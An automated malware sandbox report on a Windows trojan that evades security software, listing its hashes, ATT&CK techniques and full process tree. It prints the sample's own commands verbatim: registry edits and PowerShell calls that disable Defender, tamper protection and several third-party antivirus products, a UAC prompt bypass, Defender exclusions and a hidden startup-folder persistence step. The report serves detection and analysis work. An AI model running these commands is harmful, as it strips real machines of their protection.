e9fb20dda9f6e356a21dc67a63ab4df04c2a38af8e0fc2acb7d9e01bd6864749

General

Target

6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
Size

142KB
MD5

824247ace17fdb122110cf96aba85484
SHA1

8b6a758d3fef912321d127c3a9da0a77af8e574e
SHA256

e9fb20dda9f6e356a21dc67a63ab4df04c2a38af8e0fc2acb7d9e01bd6864749
SHA512

5d1862e383e1ff21f639842dd22126480a993a31060e50e5a102a41ecdc41077f179aec105abd084354112519cd34c89676164f43114b8c589ffd66ce918c715
SSDEEP

3072:d7DhdC6kzWypvaQ0FxyNTBfNU/JMQNX1j8KCOdW6m1cTxotQX:dBlkZvaF4NTB1U/JM8XaOdW6miTEQX

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Windows security bypass 2 TTPs 1 IoCs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Drops startup file 4 IoCs

Processes:

attrib.exepowershell.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\program.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	cmd.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1344 powershell.exe
1704 powershell.exe
924 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1344 powershell.exe
Token: SeDebugPrivilege 1704 powershell.exe
Token: SeDebugPrivilege 924 powershell.exe

pid	process
1344	powershell.exe
1704	powershell.exe
924	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1344	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	924	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.execmd.exenet.exe

description	pid	process	target process
PID 316 wrote to memory of 1596	316	6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	cmd.exe
PID 316 wrote to memory of 1596	316	6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	cmd.exe
PID 316 wrote to memory of 1596	316	6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	cmd.exe
PID 316 wrote to memory of 1596	316	6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe	cmd.exe
PID 1596 wrote to memory of 1616	1596	cmd.exe	net.exe
PID 1596 wrote to memory of 1616	1596	cmd.exe	net.exe
PID 1596 wrote to memory of 1616	1596	cmd.exe	net.exe
PID 1616 wrote to memory of 1352	1616	net.exe	net1.exe
PID 1616 wrote to memory of 1352	1616	net.exe	net1.exe
PID 1616 wrote to memory of 1352	1616	net.exe	net1.exe
PID 1596 wrote to memory of 660	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 660	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 660	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 332	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 332	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 332	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1180	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1180	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1180	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 976	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 976	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 976	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1348	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1348	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1348	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1160	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1160	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1160	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 296	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 296	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 296	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 676	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 676	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 676	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 968	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 968	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 968	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1912	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1912	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1912	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 804	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 804	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 804	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1724	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1724	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1724	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1496	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1496	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1496	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 692	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 692	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 692	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 864	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 864	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 864	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1812	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1812	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 1812	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 324	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 324	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 324	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 532	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 532	1596	cmd.exe	reg.exe
PID 1596 wrote to memory of 532	1596	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1776 attrib.exe

pid	process
1776	attrib.exe

C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
"C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\13A.tmp\13B.tmp\13C.bat C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"
2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\system32\net.exe
net session
3⤵
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
4⤵
PID:1352

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:660

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:332

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
3⤵
PID:1180

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:976

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1348

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1160

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:296

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
3⤵
PID:676

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
3⤵
PID:968

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\AVAST Software\Avast" /v DisableAntiVirus /t REG_DWORD /d 1 /f
3⤵
PID:1912

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\McAfee\Endpoint\AV" /v EnableOnAccessScan /t REG_DWORD /d 0 /f
3⤵
PID:804

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Symantec\Symantec Endpoint Protection\SMC" /v smc_enable /t REG_DWORD /d 0 /f
3⤵
PID:1724

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc." /v AllowUnloading /t REG_DWORD /d 1 /f
3⤵
PID:1496

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\SafeDog" /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:692

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP13\settings" /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:864

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\SecureMac" /v GlobalSwitch /t REG_DWORD /d 0 /f
3⤵
PID:1812

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\Symantec Endpoint Protection\AV" /v EnableAutoProtect /t REG_DWORD /d 0 /f
3⤵
PID:324

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 5 /f
3⤵
PID:532

C:\Windows\system32\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\FeatureManagement\Overrides\0\2093230218" /v EnabledState /t REG_DWORD /d 0 /f
3⤵
PID:1508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-MpPreference -DisableTamperProtection $true"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1344

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
3⤵
PID:948

C:\Windows\system32\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d 4 /f
3⤵
PID:1532

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "4" /f
3⤵
PID:1012

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t REG_DWORD /d "2" /f
3⤵
PID:1084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v FilterAdministratorToken /t REG_DWORD /d 1 /f
3⤵
PID:748

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
PID:1676

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v ""C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"" /t REG_DWORD /d "0" /f
3⤵
PID:1256

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v ""C:\Users\Admin\AppData\Local\Temp"" /t REG_DWORD /d "0" /f
3⤵
- Windows security bypass
PID:1920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut(\""C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\program.lnk"\"); $s.TargetPath = \""C:\Users\Admin\AppData\Local\Temp\program.exe"\"; $s.WorkingDirectory = \""C:\Users\Admin\AppData\Local\Temp"\"; $s.IconLocation = \""C:\Users\Admin\AppData\Local\Temp\program.exe"\"; $s.Save()"
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:1776

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Hidden Files and Directories

1

T1158

Privilege Escalation

Bypass User Account Control

1

T1088

Defense Evasion

Modify Registry

3

T1112

Disabling Security Tools

3

T1089

Bypass User Account Control

1

T1088

Hidden Files and Directories

1

T1158

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\13A.tmp\13B.tmp\13C.bat
Filesize
48KB

MD5
a441547bf9949c2903a3eea35ee4da65

SHA1
97eda2f9d21b8e9f44d0695d73d70a406c976b99

SHA256
15c7f95ef37f78ce24d32fd5bc473e8bbec4e25fe10ebf5aab9c94155326b82d

SHA512
9dabae688c3a46f192363cc1bdebf53ad62fc79b966e3d32a38fc2bf02e0a6f9d2aab23a8c8d9ce00ba1b1ae22b331838032a16f8a8a5b784ef4b6a701d28a3a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
24e1211da630303861a02c6f3f41ad7c

SHA1
20dec532156a94f60cb7a7d7063adf0bf9c25bcc

SHA256
ca416c86d3de9f97c69bdb9eebd7f41a65a75cf366f742a50a80fff2250f5d8e

SHA512
e94c9baa00ac1be979bd1d3d7efcaf08c314332cad59fbc08c7aab0f3ee7fc96e3220e6bffb76cf4bdea3bc08e2be406121e11c476de173ba8c8805d6cd2a785

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
24e1211da630303861a02c6f3f41ad7c

SHA1
20dec532156a94f60cb7a7d7063adf0bf9c25bcc

SHA256
ca416c86d3de9f97c69bdb9eebd7f41a65a75cf366f742a50a80fff2250f5d8e

SHA512
e94c9baa00ac1be979bd1d3d7efcaf08c314332cad59fbc08c7aab0f3ee7fc96e3220e6bffb76cf4bdea3bc08e2be406121e11c476de173ba8c8805d6cd2a785

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QJMQ3D0KM0E89N0AU7HD.temp
Filesize
7KB

MD5
24e1211da630303861a02c6f3f41ad7c

SHA1
20dec532156a94f60cb7a7d7063adf0bf9c25bcc

SHA256
ca416c86d3de9f97c69bdb9eebd7f41a65a75cf366f742a50a80fff2250f5d8e

SHA512
e94c9baa00ac1be979bd1d3d7efcaf08c314332cad59fbc08c7aab0f3ee7fc96e3220e6bffb76cf4bdea3bc08e2be406121e11c476de173ba8c8805d6cd2a785

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
Filesize
142KB

MD5
824247ace17fdb122110cf96aba85484

SHA1
8b6a758d3fef912321d127c3a9da0a77af8e574e

SHA256
e9fb20dda9f6e356a21dc67a63ab4df04c2a38af8e0fc2acb7d9e01bd6864749

SHA512
5d1862e383e1ff21f639842dd22126480a993a31060e50e5a102a41ecdc41077f179aec105abd084354112519cd34c89676164f43114b8c589ffd66ce918c715

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/924-83-0x0000000002444000-0x0000000002447000-memory.dmp

Filesize
12KB

Download
memory/924-84-0x000000000244B000-0x0000000002482000-memory.dmp

Filesize
220KB

Download
memory/1344-64-0x0000000002964000-0x0000000002967000-memory.dmp

Filesize
12KB

Download
memory/1344-63-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/1344-65-0x000000000296B000-0x00000000029A2000-memory.dmp

Filesize
220KB

Download
memory/1344-62-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/1344-61-0x00000000023E0000-0x00000000023E8000-memory.dmp

Filesize
32KB

Download
memory/1344-60-0x000000001B380000-0x000000001B662000-memory.dmp

Filesize
2.9MB

Download
memory/1704-72-0x000000001B0A0000-0x000000001B382000-memory.dmp

Filesize
2.9MB

Download
memory/1704-73-0x0000000001E60000-0x0000000001E68000-memory.dmp

Filesize
32KB

Download
memory/1704-74-0x0000000002530000-0x00000000025B0000-memory.dmp

Filesize
512KB

Download
memory/1704-75-0x0000000002530000-0x00000000025B0000-memory.dmp

Filesize
512KB

Download
memory/1704-76-0x0000000002530000-0x00000000025B0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads